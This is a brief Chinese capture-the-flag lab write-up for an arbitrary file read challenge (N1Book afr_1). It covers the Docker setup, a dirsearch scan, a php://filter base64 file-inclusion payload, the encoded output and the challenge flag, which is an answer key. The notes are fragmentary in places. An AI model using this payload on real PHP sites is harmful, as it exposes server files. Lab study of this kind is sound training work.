| 漏洞名称 | 任意文件读取漏洞 afr_1 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐ |
| 漏洞环境 | docker |
| 攻击方式 |
高危
暂无
| 靶场 | docker |
| 工具 | BurpSuite |
1.创建docker-compose.yml文件
version: '3.2'
services:
web:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
ports:
- 80:80
2.将该代码写入文件

启动方式
docker-compose up -dflag
n1book{afr_1_solved}
关闭
sudo docker-compose down
3.访问kali 80端口
搭建成功
dirsearch --url http://10.9.47.79


所以可能是/index.html包含了?p=hello
文件包含
?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

n1book{afr_1_solved}
升级
打补丁
上设备